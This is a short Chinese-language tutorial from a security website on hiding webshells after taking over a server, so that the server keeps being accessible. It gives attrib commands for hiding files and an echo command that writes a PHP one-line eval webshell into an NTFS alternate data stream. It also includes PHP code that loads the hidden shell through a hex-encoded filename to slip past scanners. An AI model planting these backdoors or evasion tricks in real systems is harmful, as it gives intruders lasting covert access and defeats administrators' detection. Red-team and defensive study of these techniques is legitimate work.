1. 极安网首页
  2. 网络安全技术

木马隐藏技巧

未知攻,焉知防,在红蓝对抗中,我们在拿下一个服务器之后该如何让权限维持的久一些而不被管理员轻易的发现 ,就需要在我们上传的木马动点手脚想办法不被管理员以及检测工具快速的发现。

一.attrib

attrib用法: attrib+文件路径+参数

参数说明:

+r 设置只读属性
-r 取消只读属性
+a 设置存档属性
-a 取消存档属性
+s 设置系统属性
-s 取消系统属性
+h 设置隐藏属性
-h 取消隐藏属性
/s 显示目录下所有文件的属性
/d 将attrib和任意命令行选项应用到目录

利用参数就能够创建隐藏文件:

attrib +s +a +r +h
attrib +s +h 文件名

这里我用upload-labs做了验证,执行完命令后当前目录下的文件即隐藏,即使开启了显示隐藏的文件或是dir都是看不见的

木马隐藏技巧-极安网

二.利用ADS隐藏文件

通过在命令行中echo一个数据流从而创建一个ADS隐藏文件

  1. echo ^<?php @eval($_POST['pass']);?^> > index.php:shell.jpg

木马隐藏技巧-极安网

我们只能看见一个index.php文件,且内容为空,通过命令行输入完整的文件名即可通过notepad进行编辑,可以看到我们echo进去的一句话木马

虽然我们已经将文件隐藏了,都是木马并不能够起作用,这里就需要用到文件包含,

可以在当前目录下新建一个test.php文件,

  1. <?php include(‘index.php:shell.jpg’);?>

对木马文件进行包含,不过这样直接进行包含很容易就被查杀了,看了一些资料看见大佬们是利用PHP可变变量进行二次转换加上对包含的文件名进行hex处理进行绕过的。

具体的代码:

  1. <?php
  2. $a="696E6465782E7068703"." A7368656C6C2E6A7067";
  3. $b="a";
  4. include(PACK('H*',$$b))
  5. ?>

原创文章,作者: Admin ,转载请注明出处:https://secvery.com/2580.html